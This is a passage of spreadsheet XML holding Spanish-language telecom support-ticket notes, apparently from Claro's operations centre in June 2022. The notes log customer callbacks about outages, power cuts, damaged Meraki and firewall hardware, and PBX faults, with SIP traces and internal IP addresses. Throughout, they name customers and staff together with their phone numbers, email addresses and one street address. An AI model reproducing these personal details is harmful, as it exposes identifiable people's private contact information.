SE CONVERSA CON CLEINTE SELVIN ISRAEL FUENTES RAMÍREZ, INDICA QUE NO SE TIENE ENERGIA ELECTRICA EN SITIO, ESTO SE MANTENDRA DURANTE TODO EL DIA, POR LO QUE AUTORIZA CIERRE DE CASO, SI SERVCIO NO RESTABLECE CUANDO LA ENERGIA VUELVA, ENTONCES REALIZARA REPORTE.
2001418200
COLA:
NOMBRE: A: 49872286
NÚMERO: 011 50249872286
DURACIÓN: 0:01:16
ESTADO: DESCONECTADO [COLGADO LOCALMENTE]
DETALLES: +50249872286
PROCESO ASOCIADO:
SERVIDOR IC: CEN-GT-CIC-02
USUARIO DE IC: LUVY.SANDOVAL
FECHA Y HORA LOCALES: 10/06/2022 11:05:33</t>
  </si>
  <si>
    <t>F4597150</t>
  </si>
  <si>
    <t>**SE LLAMA A CLIENTE GERARDO MANFREDY GONZALEZ MOLINA AL 4138 5114 SOLICITA QUE SE LE LLAME EN 5 MIN QUE CONFIRMARA SI CUENTAN CON ENERGIA**
ID 2001431001
**</t>
  </si>
  <si>
    <t>SE LLAMA A CLIENTE  GERARDO MANFRED  NÚMERO: 4138 5114  QUIEN INDICA QUE LO QUE NO HAY EN SITIO Y EL MOTIVO POR EL CUAL EL SERVICIO SE ENCUENTRA CAÍDO ES QUE NO HAY ENERGÍA ELECTRICA EN SITIO
CLIENTE INDICA QUE SE PUEDE PROCEDER CON EL CIERRE
2001461339
COLA:
NOMBRE: A: 41385114
NÚMERO: 41385114
DURACIÓN: 0:01:37
ESTADO: DESCONECTADO [DESCONEXIÓN LOCAL]
DETALLES: 41385114
PROCESO ASOCIADO:
SERVIDOR IC: CEN-GT-CIC-02
USUARIO DE IC: DIONICIO.VELIZ
FECHA Y HORA LOCALES: 10/06/2022 13:09:16</t>
  </si>
  <si>
    <t>**SE LLAMA A CLIENTE GERARDO MANFREDY GONZALEZ MOLINA AL 4138 5114 CONFIRMA QUE NO HAY ENERGIA EN SITIO **
ID 2001452895
**</t>
  </si>
  <si>
    <t>**SE LLAMA A CLIENTE GERARDO MANFREDY GONZALEZ MOLINA AL 4138 5114 NO RESPONDE || SE INTENTARA LUEGO**
ID 2001438073
**</t>
  </si>
  <si>
    <t>F4597156</t>
  </si>
  <si>
    <t>SE LLAMA A CLIENTE  OSCAR  ZABAL 55658964 MENCIONA QUE SE CONTACTARA CON CC CUANDO TENGA PROBLEMA
-ID 2001432022</t>
  </si>
  <si>
    <t>SE CONTACTA AL CLIENTE  OSCAR  ZABAL AL 55658964  ID 2001492135 EN EL CUAL COMENTA QUE SE PUEDE PROCEDER CON EL CIERRE NO LO VALIDA AL 100% SIN EMBARGO COMENTA QUE HARÁ UNA ACTUALIZACIÓN DE FIREWAL QUE NO CONSIDERA QUE LO SEA Y COMO EL ES DEL EQUIPO DE IT COMENTA QUE HA HECHO PRUEBAS DE DEJAR UNA SOLA MAQUINA Y BRINDA SIEMPRE TIEMPOS ALTOS, BAJO SU CONSENTIMIENTO COMENTA QUE SE PUEDE CERRAR EL TICKET POR SER FIN DE SEMANA Y EL DÍA LUNES VALIDARA COMO SE COMPORTA CASO CONTRARIO SOLICITARA UNA CERTIFICACIÓN, SE PROCEDE A SOLICITA EL CIERRE DE LA FALLA CON EL GESTOR LUIS.IXCOT VÍA SKYPE  Y SE PROCEDE CON EL CIERRE DEL TICKET</t>
  </si>
  <si>
    <t>F4597167</t>
  </si>
  <si>
    <t>SE ENVIO EL SEGUIENTE CORREO AL CLIENTE.
BUENAS TARDES,
SE HABLO CON EL PERSONAL DE INGENIERA QUIEN INDICO QUE NO HAY RESTRICCIONES DE NUMERACIÓN EN EL EQUIPO AETHRA INSTALADO.
SE ESTÁN ENVIANDO LOS 8 DÍGITOS TAL Y COMO ESTABA EN LA CENTRAL ANTERIOR.
SI REQUIEREN ALGÚN CAMBIO NOS PODRÍAN INFORMAR POR ESTA VÍA.
SE LLAMO AL NÚMERO 2564-6000, LA LLAMADA COMPLETA. DA UN MENSAJE EN INGLES QUE PROVIENE DE LA PBX.
CON ESTO SE VALIDA QUE LA LLAMADA SI ESTÁ COMPLETANDO.
ADJUNTO TRAZA DONDE SE REALIZA LA PRUEBA DE LLAMADA.
CURRENT PROXY HOST       : 10.173.75.129
  SECONDARY PROXY HOSTS  : NONE
INTERFACE STATUS         : TRAFICO (10.3.8.10) UP
REGISTRATION STATUS      : NO REGISTRATION REQUIRED
MESSAGE WAITING          : NO
CALL DESCRIPTION
DIR USER-TERM                    STATUS       LOCAL-NUMBER         REMOTE-NUMBER        CODEC
IN  ISDN-PRI-LINE-1              CONNECTED    25646000             +50222245301         G.711-ALAW
STATUS OF CALL-MNG
CALL DESCRIPTION
TRUNK             DIR USER-TERM                    STATUS       LOCAL-NUMBER         REMOTE-NUMBER        CODEC
SIP-25646000      IN  ISDN-PRI-LINE-1              CONNECTED    25646000             +50222245301         G.711-ALAW
COMMAND EXECUTED
1036769_DID_ALLIED-GLOBAL_SAN_46\VOIP&gt;&gt;
&lt;&lt;&lt; SIP RX FROM 10.173.75.129:5060:
SIP/2.0 200 OK
VIA: SIP/2.0/UDP 10.3.8.10:5060;BRANCH=Z9HG4BK7E5759C6;RPORT=5060
CALL-ID: ISBCZYFP0583315120APBEGHEFCRBDM@HNPRO1M.MSS.CLARO.COM.HN
FROM: &lt;SIP:25646000@P1S3PB.CLARO.COM.HN;USER=PHONE&gt;;TAG=AS307473C9
TO: &lt;SIP:+50222245301@HNPRO1M.MSS.CLARO.COM.HN;USER=PHONE&gt;;TAG=06022138463019 ¿
SE ESTA ENVIANDO EL +502 TAMBIEN.
CSEQ: 102 BYE
ALLOW: INVITE,ACK,OPTIONS,BYE,CANCEL,PRACK,UPDATE
CONTENT-LENGTH: 0
SALUDOS.</t>
  </si>
  <si>
    <t>F4597172</t>
  </si>
  <si>
    <t>SE LLAMA A CLIENTE SR. HERNALDO   8720-1235 ...</t>
  </si>
  <si>
    <t>F4597173</t>
  </si>
  <si>
    <t>**SE LLAMA A CLIENTE HERNALDO  8720-1235 NO RESPONDE || SE INTENTARA LUEGO **
-ID 2001439393
**</t>
  </si>
  <si>
    <t>F4597178</t>
  </si>
  <si>
    <t>-*- EMILIO AGUILAR 52 55 5174 5290 (CLIENTE)  INFORMA QE SU FOLIO INTERNO YA SE ENCUENTRA CERRADO, AUTORIZA CIERRE DE TICKET -*
-*</t>
  </si>
  <si>
    <t>SE LLAMÓ A CLIENTE 00 525551745299 PARA SEGUIMIENTO Y/O VALIDAR SERVICIO, ME DEJAN DEMASIADO TIEMPO EN ESPERA; SE DEBE INTENTAR MÁS TARDE, SE PIDE APOYO VÍA CORREO:
ASUNTO: RE: SOLICITUD DE SOPORTE ::: BIMBO INTERNACIONAL - GB BPA ARRIAJAN - G74-M00004PA-PA0537F-NP (20559620PA) - LINK DOWN - LINK DOWN || IMBBL004229</t>
  </si>
  <si>
    <t>F4597186</t>
  </si>
  <si>
    <t>SE ENVIA CORREO A CLIENTE
RE: SOLICITUD DE SOPORTE ::: ID LOCAL 426100019T::: TICKET CNOC IMBBL004228::: "BIMBO INTERNACIONAL"</t>
  </si>
  <si>
    <t>SE LLAMÓ A CLIENTE 00 525551745299 PARA SEGUIMIENTO Y/O VALIDAR SERVICIO, ME DEJAN DEMASIADO TIEMPO EN ESPERA; SE DEBE INTENTAR MÁS TARDE, SE PIDE APOYO VÍA CORREO:
ASUNTO: RE: SOLICITUD DE SOPORTE ::: ID LOCAL 426100019T::: TICKET CNOC IMBBL004228::: "BIMBO INTERNACIONAL"</t>
  </si>
  <si>
    <t>F4597191</t>
  </si>
  <si>
    <t>**SE LLAMA A CLIENTE LESTER IVAN KROLIK MORALES  30389449 SOLICITA QUE SE LE LLAME EN 15 MIN **
-ID 2001504171
**</t>
  </si>
  <si>
    <t>SE LLAMA A CLIENTE LESTER, PARA VALIDAR SERVICIO COMENTA QUE YA CUENTA CON SERVICIO Y VE TRAFICO EN EL SERVICIO, POR LO CUAL BRINDA CIERRE DE FALLA
2001504037
COLA:
NOMBRE: CONFERENCIA
NÚMERO: 4818
DURACIÓN: 0:25:01
ESTADO: CONECTADA
DETALLES: 4818
PROCESO ASOCIADO:
SERVIDOR IC: CEN-GT-CIC-02
USUARIO DE IC: JUAN.LOPEZS
FECHA Y HORA LOCALES: 10/06/2022 15:54:05</t>
  </si>
  <si>
    <t>SE LLAMA A CLIENTE LESTER IVAN KROLIK 30389449 MENCIONA QUE ESTARA GESTIONANDO LOS PERMISOS POR LO QUE SOLICITA LLAMADA PARA LAS 15:30
-ID 2001483334</t>
  </si>
  <si>
    <t>F4597192</t>
  </si>
  <si>
    <t xml:space="preserve"> CLIENTE KEVIN BONILLA  72046769 INDICA QUE YA TIENEN SERVICIO, PERO ESTÁN REALIZANDO PRUEBAS Y SOLICITA QUE SE LE CONTACTE A LAS 14:00 HORAS</t>
  </si>
  <si>
    <t>SE LLAMA A CLIENTE KEVIN BONILLA  72046769 QUIEN CONFIRMA EL FUNCIONAMIENTO DEL SERVICIO
-ID 2001485545</t>
  </si>
  <si>
    <t>F4597194</t>
  </si>
  <si>
    <t>A NIVEL DE CLARO ENLACE OK, SE PIDE APOYO A CLIENTE VÍA CORREO VALIDAR SERVICIO PARA ASÍ PROCEDER AL CIERRE.
ASUNTO: RE: RAISE A NEW TT | TOTAL ISOLATION | TGS TT: INC000003764995 | GUATEMALA| CLIENT: TELEFONICA DATACORP | PROVIDER TT:</t>
  </si>
  <si>
    <t>-*- SE VALIDA BANDEJA DE MAIL SIN RESPUESTA DE CLIENTE,SE ENVÍA NUEVAMENTE CORREO, CONTINUAMOS A LA ESPERA
RE: RAISE A NEW TT | TOTAL ISOLATION | TGS TT: INC000003764995 | GUATEMALA| CLIENT: TELEFONICA DATACORP | PROVIDER TT:</t>
  </si>
  <si>
    <t>**SE LLAMA A CLIENTE AL NUMERO +34 917 697 640 PERO NO SALEN LAS LLAMADAS A ESPERA QUE CL RESPONDA CORREO **
-ID 2001814532 - 2001814562
**
**</t>
  </si>
  <si>
    <t>SE REENVIA CORREO A CLIENTE
DE: ODALIS ANAHI CARDENAS SALAZAR &lt;ODALIS.CARDENAS@CLARO.COM.GT&gt;
ENVIADO: LUNES, 13 DE JUNIO DE 2022 9:40
PARA: CLIENTESCORPORATIVOS &lt;CLIENTESCORPORATIVOS@CLARO.COM.GT&gt;; ELDER JOSUE LOPEZ CHAVEZ &lt;ELDERJ.LOPEZ@CLARO.COM.GT&gt;; 'SMC RECOVERY EMEA BUSINESS SOLUTIONS' &lt;SMC.RECOVERY.EMEA.BUSINESSSOLUTIONS@TELEFONICA.COM&gt;; 'INFINITY ROD INBOX' &lt;INCOMING@INFINITY-MAIL.ONBMC.COM&gt;; 'SMC RECOVERY MANAGER EMEA BUSINESS SOLUTIONS' &lt;SMC.RECOVERYMANAGER.EMEA.BUSINESSSOLUTIONS@TELEFONICA.COM&gt;; 'LCE CARRIERS GLOBAL SOLUTIONS' &lt;LCE.CARRIERS.GLOBALSOLUTIONS@TELEFONICA.COM&gt;
CC: LUIS MIGUEL IXCOT MORALES &lt;LUIS.IXCOT@CLARO.COM.GT&gt;; BRYAN.VALLEJO@CLARO.COM.GT &lt;BRYAN.VALLEJO@CLARO.COM.GT&gt;; GRUPO N1 &lt;N1CLARO@CLARO.COM.GT&gt;; CNOCCA &lt;CNOCCA@CLARO.COM.GT&gt;
ASUNTO: RE: RAISE A NEW TT | TOTAL ISOLATION | TGS TT: INC000003764995 | GUATEMALA| CLIENT: TELEFONICA DATACORP | PROVIDER TT:
*-*-*-*-*-*</t>
  </si>
  <si>
    <t>F4597195</t>
  </si>
  <si>
    <t>**SE LLAMA A CLIENTE SR. ALEJANDRO 32731660 NO RESPONDE || SE INTENTARA LUEGO **
-ID 2001478457
**</t>
  </si>
  <si>
    <t>**SE LLAMA A CLIENTE SR. ALEJANDRO 32731660 NO RESPONDE || ENVIA A BUZON ||SE INTENTARA LUEGO **
-ID 2001502189
**</t>
  </si>
  <si>
    <t>**SE LLAMA A CLIENTE SR. ALEJANDRO 32731660 NO RESPONDE || ENVIA A BUZON ||SE INTENTARA LUEGO **
-ID 2001510942
**</t>
  </si>
  <si>
    <t>SE LLAMA A CLIENTE  SR. ALEJANDRO 32731660 PERO NO RESPONDE, SE INTENTARA LUEGO
-ID 2001522380</t>
  </si>
  <si>
    <t>SE LLAMA A CLIENTE SR. ALEJANDRO 32731660 NO RESPONDE, SE INTENTARA LUEGO
-ID 2001488967</t>
  </si>
  <si>
    <t>SE LLAMA A CLIENTE SR. ALEJANDRO 32731660 MENCIONA QUE PERSISTE EL INCONVENIENTE, CLIENTE SOLICITA LLAMADA PARA LAS 14:00 HRS REALIZAR PRUEBAS
-ID 2001441020</t>
  </si>
  <si>
    <t>F4597196</t>
  </si>
  <si>
    <t>SE ESTA EN LINEA CON EL TECNICO DANIEL MONTENEGRO QUIEN INDICA QUE LA ADMINISTRACIÓN DEL SITIO LO QUE INDICA ES QUE VARIOS SERVICIOS DE CLARO QUE HAN SIDO DADO DE BAJA EN EL LUGAR CLARO NO HA LLEGADO A RETIRAR EL CABLEADO Y SOLO LO CORTAN. ELLOS QUIEREN QUE SE RETIRE ESE CABLEADO PERO NO CORRESPONDE AL PERSONAL TECNICO DE CAMPO QUE ESTA REALIZANDO ESTA VISITA YA QUE SON VARIOS POSTES QUE TIENEN ESTO.  TECNICO HABLARÁ CON EL CLIENTE PARA QUE ESTE PUEDA CONVERSAR CON SU ADMINISTRACIÓN PARA QUE LOS DEJEN TRABAJAR
2001458683
COLA:
NOMBRE: A: 58263684
NÚMERO: 58263684
DURACIÓN: 0:01:58
ESTADO: CONECTADA
DETALLES: 58263684
PROCESO ASOCIADO:
SERVIDOR IC: CEN-GT-CIC-02
USUARIO DE IC: ESVINPAREDES
FECHA Y HORA LOCALES: 10/06/2022 12:59:12</t>
  </si>
  <si>
    <t>CLIENTE DANIEL PANILLA-30192676 COMENTA QUE YA SE ENCUETRA EN LAS INSTALACIONES SE LE INFORMA A TEC DANIEL 58263684 QUIEN COMENTA QUE SE DIRIGIRÁ A LAS INSTALACIONES.
RESULTADO: LLAMADA HECHA
NOMBRE: 30192676
NÚMERO: 011 50230192676
INICIO: HOY, 10:24 A. M.
FIN: HOY, 10:25 A. M.
DURACIÓN: 0:59
ID DE LLAMADA: 2001593648</t>
  </si>
  <si>
    <t>ENLACE AFECTADO POR CORTE DE FO EN SECTOR; PERSONAL DE FO SE DIRIGE A SITIO PARA INICIAR LAS REPARACIONES; ADICIONAL SE LLAMÓ A CLIENTE 30192676 / 59453159 PARA BRINDARLE AVANCES DEL TICKET, NO CONTESTA.</t>
  </si>
  <si>
    <t>F4597199</t>
  </si>
  <si>
    <t>**SE LLAMA A CLIENTE PEDRO MOLINA 77875721 INDICA QUE ESTA EN ALMUERZO QUE SE LE LLAME EN 20 MIN **
-ID 2001453785
**</t>
  </si>
  <si>
    <t>SE LLAMA A CLIENTE PEDRO MOLINA 77875721 - 70736948  MENCIONA QUE YA TODO ESTA FUNCIONANDO CORRECTAMENTE
-ID 2001523039 - 2001523186</t>
  </si>
  <si>
    <t>**SE LLAMA A CLIENTE PEDRO MOLINA 77875721 INDICA QUE SIGUE CON EL INCONVENIENTE  || SE CONTACTA A GESTOR Y SE DEJA EN LIENA CON CLIENTE **
-ID 2001466441
**</t>
  </si>
  <si>
    <t>F4597205</t>
  </si>
  <si>
    <t>##EN CONFERENCIA CON COMPAÑERO DIONICIO VELIZ , EDDU AREVALO DEL SOC Y CLIENTE FLOR SANTIZO REALIZANDO PRUEBAS LUEGO DE LAS CONFIG REALIZADAS EN EL MERAKI###
3001403944
COLA:
NOMBRE: CONFERENCIA
NÚMERO: 4197
DURACIÓN: 0:09:29
ESTADO: CONECTADA
DETALLES: 4197
PROCESO ASOCIADO:
SERVIDOR IC: CEN-GT-CIC-02
USUARIO DE IC: VELDIN.PALENCIA
FECHA Y HORA LOCALES: 15/06/2022 15:33:10</t>
  </si>
  <si>
    <t>SE LLAMÓ A CLIENTE 51176423/22259499 PARA SEGUIMIENTO Y/O VALIDAR SERVICIO, NO CONTESTA; SE DEBE INTENTAR MÁS TARDE.</t>
  </si>
  <si>
    <t>*** SE RESPONDE A CLIENTE, Y SE LE COMENTA QUE SE DEBE DE SOLVENTAR TEMA DE PROTECCIÓN ELÉTRICA, YA QUE POR NO CONTAR CON LA SEGURIDAD NECESARIA, HA DAÑADO EL POE DE MERAKI Y PUERTO DE FW. ****
DE: ANGEL DANIEL TORRES AJTUN &lt;ANGEL.TORRES@CLARO.COM.GT&gt;
ENVIADO: LUNES, 13 DE JUNIO DE 2022 9:22
PARA: GT SOPORTE FINCA GUATEMALA &lt;SOPORTE@FINCA.GT&gt;; CARLOS ESTUARDO LEIVA RAMIREZ &lt;CARLOSE.LEIVA@CLARO.COM.GT&gt;
CC: GRUPO N1 &lt;N1CLARO@CLARO.COM.GT&gt;; CNOCCA &lt;CNOCCA@CLARO.COM.GT&gt;; CLIENTESCORPORATIVOS &lt;CLIENTESCORPORATIVOS@CLARO.COM.GT&gt;; THARSIS ADADAI SANTOS GARNIGA &lt;THARSIS.SANTOS@FINCA.GT&gt;; MARINA ISABEL CASTELLANOS GOMEZ &lt;MARINA.CASTELLANOS@FINCA.GT&gt;
ASUNTO: RE: TTK F4597205 // 284500078
ESTIMADOS BUEN DÍA,
EN SEGUIMIENTO DEL CASO REPORTADO, DE MOMENTO SE DETERMINÓ QUE PUERTO 5 DE FW Y POE DE MERAKI SE ENCUENTRAN QUEMADOS, ELLO DEBIDO A QUE SE TIENEN BAJONES DE ENERGÍA EN SITIO. DE MOMENTO SE DETERMINA POR NUESTRO PERSONAL TÉCNICO QUE NO SE CUENTA CON LA PROTECCIÓN ELÉCTRICA NECESARIA PARA EVITAR DAÑOS SOBRE LOS EQUIPOS.
¿SIENDO ASÍ, DE MOMENTO SE ESTÁ TRATANDO DE PODER UBICAR REPUESTO PARA EL POE DEL MERAKI Y ASÍ RESTABLECER EL SERVICIO WI-FI, AL MOMENTO DE TENER LA CONFIRMACIÓN DE PERSONAL TÉCNICO DE CONTAR CON EL REPUESTO SE ESTARÁ NOTIFICANDO.
ADICIONAL, SE HA ESCALADO EL PROBLEMA DE PROTECCIÓN ELÉCTRICA CON EL ÁREA COMERCIAL, FAVOR DE SU APOYO EN PODERSE AVOCAR CON EJECUTIVO POST VENTA Y SOLVENTAR DICHO TEMA.
CUALQUIER DUDA O COMENTARIO QUEDO A LA ORDEN,
SALUDOS CORDIALES.</t>
  </si>
  <si>
    <t>####SE LOGRA VERIFICAR CON CLIENTE TARCIS SANTOS 54318278  QUE YA TIENE CONECTIVIIDAD CON SU WI FI##
3001416216
COLA:
NOMBRE: CONFERENCIA
NÚMERO: 4197
DURACIÓN: 0:07:43
ESTADO: CONECTADA
DETALLES: 4197
PROCESO ASOCIADO:
SERVIDOR IC: CEN-GT-CIC-02
USUARIO DE IC: VELDIN.PALENCIA
FECHA Y HORA LOCALES: 15/06/2022 16:08:59</t>
  </si>
  <si>
    <t>SE LLAMA A CLIENTE TARCIS SANTOS 54318278  QUIEN VALIDA Y AUN NO TIENEN CONEXION A WIFI
-ID 3001413423</t>
  </si>
  <si>
    <t>**SE LLAMA A CLIENTE JORGE FAJARDO AL 50159388 INDICA QUE YA CAMBIO EL UPS Y QUE YA CUENTA CON PROTECCION ELÉCTRICA || SE NOTIFICA A GESTOR **
-ID 3001135648
**</t>
  </si>
  <si>
    <t>F4597233</t>
  </si>
  <si>
    <t>SE LLAMA TAMBIEN AL CLIENTE FRANCISCO ULLOA NO RESPONDE
2001447652
COLA:
NOMBRE: A: 0050377449901
NÚMERO: 0050377449901
DURACIÓN: 0:00:25
ESTADO: DESCONECTADO [DESCONEXIÓN LOCAL]
DETALLES: 0050377449901
PROCESO ASOCIADO:
SERVIDOR IC: CEN-GT-CIC-02
USUARIO DE IC: ESVINPAREDES
FECHA Y HORA LOCALES: 10/06/2022 12:23:25
2001447784
COLA:
NOMBRE: A: 0050377449901
NÚMERO: 0050377449901
DURACIÓN: 0:00:27
ESTADO: DESCONECTADO [DESCONEXIÓN LOCAL]
DETALLES: 0050377449901
PROCESO ASOCIADO:
SERVIDOR IC: CEN-GT-CIC-02
USUARIO DE IC: ESVINPAREDES
FECHA Y HORA LOCALES: 10/06/2022 12:23:30</t>
  </si>
  <si>
    <t>CLIENTE FRANCISCO ULLOA SOLICITA SE LE LLAME EN 15 MINUTOS.78242588
2001469564
COLA:
NOMBRE: A: 0050377449901
NÚMERO: 0050377449901
DURACIÓN: 0:04:26
ESTADO: CONECTADA
DETALLES: 0050377449901
PROCESO ASOCIADO:
SERVIDOR IC: CEN-GT-CIC-02
USUARIO DE IC: ESVINPAREDES
FECHA Y HORA LOCALES: 10/06/2022 13:38:03</t>
  </si>
  <si>
    <t>SE HABLA AL NUMERO 77449901 QUE ES DE LA EJECUTIVA CARMEN, QUIEN PROCEDE A CONTACTAR AL CLIENTE PARA QUE SE PUEDA ENLAZAR EL PUNTO REMOTO.
2001469564
COLA:
NOMBRE: A: 0050377449901
NÚMERO: 0050377449901
DURACIÓN: 0:00:59
ESTADO: CONECTADA
DETALLES: 0050377449901
PROCESO ASOCIADO:
SERVIDOR IC: CEN-GT-CIC-02
USUARIO DE IC: ESVINPAREDES
FECHA Y HORA LOCALES: 10/06/2022 13:34:35</t>
  </si>
  <si>
    <t>SE LLAMA AL CLIENTE FRANCISCO ENVIA A BUZON.
2001488091
COLA:
NOMBRE: A: 0050378242588
NÚMERO: 0050378242588
DURACIÓN: 0:00:21
ESTADO: MARCANDO
DETALLES: 0050378242588
PROCESO ASOCIADO:
SERVIDOR IC: CEN-GT-CIC-02
USUARIO DE IC: ESVINPAREDES
FECHA Y HORA LOCALES: 10/06/2022 14:36:19
2001487937
COLA:
NOMBRE: A: 0050378242588
NÚMERO: 0050378242588
DURACIÓN: 0:00:33
ESTADO: DESCONECTADO [DESCONEXIÓN LOCAL]
DETALLES: 0050378242588
PROCESO ASOCIADO:
SERVIDOR IC: CEN-GT-CIC-02
USUARIO DE IC: ESVINPAREDES
FECHA Y HORA LOCALES: 10/06/2022 14:36:36
2001488525
COLA:
NOMBRE: A: 0050378242588
NÚMERO: 0050378242588
DURACIÓN: 0:00:11
ESTADO: MARCANDO
DETALLES: 0050378242588
PROCESO ASOCIADO:
SERVIDOR IC: CEN-GT-CIC-02
USUARIO DE IC: ESVINPAREDES
FECHA Y HORA LOCALES: 10/06/2022 14:36:47</t>
  </si>
  <si>
    <t>F4597260</t>
  </si>
  <si>
    <t>SE VALIDA QUE AUN NO SE CUENTA CON LA RESPUESTA EN LA COLA DE CORREOS, SE INTENTA LLAMAR A LA CENTRAL AL  +52 55 5174 5290 CON EMILIO AGUILAR ID 2001486268 ATIENDE  GUADALUPE SANCHEZ Y COMENTA QUE YA CERRARON  EL TICKET YA QUE SE VIO AFECTADO EL SERVICIO POR UN CORTE DE ENERGÍA Y LO VEN YA OPERATIVO NO SERA NECESARIO INTERVENIR Y SE PROCEDE CON EL CIERRE DE FALLA Y TICKET SE NOTIFICA AL GESTOR RAMOS.MARLON PARA EL CIERRE.</t>
  </si>
  <si>
    <t>F4597261</t>
  </si>
  <si>
    <t>CLIENTE CONFIRMA VIA SKYPE QUE SE TIENEN PROBLEMAS DE ENERGÍA</t>
  </si>
  <si>
    <t>F4597288</t>
  </si>
  <si>
    <t>SE LLAMA A CLIENTE JACQUELINE TORRES-59274997  ##SE TIENE EN LINEA ##</t>
  </si>
  <si>
    <t>###EN PRUEBAS REALIZADAS CON PERSONAL DE CX + PR SE DETERMINA QUE EL PROBLEMA ES LA PBX ### CLIENTE ESCALARA CASO A SU PROVEEDOR DE PLANTA ##VIVO</t>
  </si>
  <si>
    <t>JACQUELINE TORRES-59274997 ## QUEDA ENTERADA ###CLIENTE ESCALA CON SU PROVEEDOR ##SE PROCEDE AL CIERRE##VIVO</t>
  </si>
  <si>
    <t>SE REALIZA PRUEBAS CON CLIENTE- SE OBSERVA EN TRAZA QUE LA LLAMADA SI SE ESTA EFECTUANDO PERO SE LIBERAN CON :
REASON: Q.850;CAUSE=4;TEXT="SEND SPECIAL INFORMATION TONE"
REASON: SIP;CAUSE=500;TEXT="SERVER INTERNAL ERROR"
FRAGMENTO DE TRAZA:
SIP/2.0 500 SERVER INTERNAL ERROR
VIA: SIP/2.0/UDP 10.16.113.38:5060;BRANCH=Z9HG4BKXCRV1PWM1OOWWMXZ7XOCO7W7M;ROLE=3;DPT=7C14_16;TRC=4767-FFFFFFFF
VIA: SIP/2.0/UDP 10.16.113.27:5066;BRANCH=Z9HG4BKVVZR130GAI03XX81LPA3Z0JG3
CALL-ID: AGVARX1JXJRRHAJRHHAHGI8ZX8GPR8A3@ATS.CEATS1.IMSHWI.CLARO.COM.GT.7
FROM: "ARISACOSEGE23C1514Z13MET24991000"&lt;SIP:+50224991000@IMSHWI.CLARO.COM.GT;USER=PHONE&gt;;TAG=IZ312AJX-CC-7-TRC-80526
TO: &lt;SIP:0050431444656@10.16.113.35;USER=PHONE&gt;;TAG=76CAFLOR-CC-1001-TRC-262072
CSEQ: 1 INVITE
WARNING: 399 CGPV1R2.SIPCOM "3944 SIPAPP_CR_RELEASERECV 3079 RECV REL FROM CC AND SIPSL REL POINT."
REASON: Q.850;CAUSE=4;TEXT="SEND SPECIAL INFORMATION TONE"
REASON: SIP;CAUSE=500;TEXT="SERVER INTERNAL ERROR"
P-CHARGING-VECTOR: ICID-VALUE="C8F0501E03ED53649D8DFCD591578053.3863876363.937283042.110";ORIG-IOI=CESCSCF1.IMSHWI.CLARO.COM.GT;TERM-IOI=CETMSC
CONTENT-LENGTH: 0
NUMEROS A LOQ UE EL CLIENTE LLAMA Y SI HAY TONO:
504 31444746
504 31444656
504 31429434</t>
  </si>
  <si>
    <t>F4597315</t>
  </si>
  <si>
    <t>SE COORDINARÁ VISITA TÉCNICA A NODO/CLIENTE; ADICIONAL SE LLAMÓ/HABLÓ CON EVA QUEZADA/CLIENTE 506 87100071 Y SE LE BRINDAN AVANCES DEL TICKET.</t>
  </si>
  <si>
    <t>F4597316</t>
  </si>
  <si>
    <t>**SE LLAMA A CLIENTE YACKELINE SANCHEZ AL 0050325553600 INDCIA QUE SIGUE CON EL INCONVENIENTE QUE NO LE CARGA EL INTERNET || SE NOTIFICA A GESTOR **
-ID 2001480067
**</t>
  </si>
  <si>
    <t>F4597337</t>
  </si>
  <si>
    <t>**SE LLAMA A CLIENTE HERNALDO CRUZ AL 8720-1235 CONFIRMA SERVICIO ESTABLE INFORMA QUE EL PROBLEMA FUE POR ENERGIA **
-ID 2001502189
**</t>
  </si>
  <si>
    <t>SE LLAMA A CLIENTE HERNALDO CRUZ 87201235 NO RESPONDE, SE INTENTARA LUEGO
-ID 2001489887</t>
  </si>
  <si>
    <t>F4597353</t>
  </si>
  <si>
    <t>SE LLAMA A CLIENTE 75167824 MENCIONA QUE PERSONAL TECNICO YA LLEGO A PR Y VALIDO QUE EL SERVICIO NO RESPONDIA POR LO QUE PERSONAL TECNICO INDICO QUE IRIA A LA ANTENA
SE NOTIFICARA PARA EL SEGUIMIENTO
-ID 2001510030</t>
  </si>
  <si>
    <t>F4597370</t>
  </si>
  <si>
    <t>SE LLAMA A CLIENTE ENRIQUE BRICEÑO 9660-4533 ENVIA DIRECTO A BUZON, SE INTENTARA LUEGO
-ID 2001492489</t>
  </si>
  <si>
    <t>SE LLAMA A CLIENTE ENRIQUE BRICEÑO 99604533 RESPONDE OMAR MENCIONA QUE DESDE QUE LO INSTALARON NO HAN PODIDO CONECTARSE A LOS EQUIPOS DE CLARO, SE NOTIFICARA PARA EL SEGUIMIENTO
-ID 2001496692</t>
  </si>
  <si>
    <t>SE LLAMA A CLIENTE JOSUE VILLEDA 31808554  QUIEN CONFIRMA EL CONTACTO DE PR  99604533
-ID 2001495493</t>
  </si>
  <si>
    <t>F4597371</t>
  </si>
  <si>
    <t>SE CONVERSA CON CLIENTE NESTOR, MENCIONA QUE NO SE PUEDE ENVIAR CORREOS DE GMAIL, LOS CORREOS  INSTITUCIONALES SI SE ENVIAN,  EL ROUTER SE REINICIA SIN INTERVENCION, YA VALIDADARON Y NO ES INCONVENIENTE CON ENERGIA, ADEMAS INDICA NO ASIGNA DHCP,  POR LO QUE SOLICITA INSPECCION DEL EQUIPO. CONFIRMA DATOS PARA VISITA EL DIA LUNE DE SER NECESARIO:
HORARIO DE ATENCION:  LUNES A PRIMERA  HORA DE  8:00 A 17:00 HORAS
PERMISOS. NO
DIRECCION: CALLE CIRCUMBALACION AVENIDAD REVOLUCION EDI 113 NOVEL 2 LOCAL 4  COLONO SAN BENITO SAN SALVADOR, FRENTE AL RESTARANTE POMODORO. CERCA DE SHERATON PRESIDENTE.
CONTACTO EN SITIO:  NESTOR BERNAL  25557637 - 78402741
NÚMERO: 0050325557637
FIN: HOY, 14:21
ID DE LLAMADA: 2001479167</t>
  </si>
  <si>
    <t>F4597380</t>
  </si>
  <si>
    <t>SE LLAMA A CLIENTE VICTOR GARMENDIA / 89070333 QUIEN CONFIRMA EL FUNCIONAMIENTO DEL SERVICIO
-ID 2001516302</t>
  </si>
  <si>
    <t>CLIENTE SR. VICTOR GARMENDIA / 89070333 APLICA REINICIO A LOS EQUIPOS, INFORMA QUE EL ETX-1 QUE NO ENCIENDE LA LED DE NET1, SE PROCEDE A SOLICITAR APOYO DE O&amp;M.</t>
  </si>
  <si>
    <t>F4597401</t>
  </si>
  <si>
    <t>SE HABLO CON EL CLIENTE DAMARIS AVILA QUIEN NO UBICA LOS EQUIPOS SE LE SOLICITO UNA FOTO VIA WHATSAPP
2001486294
COLA:
NOMBRE: A: 57953241
NÚMERO: 57953241
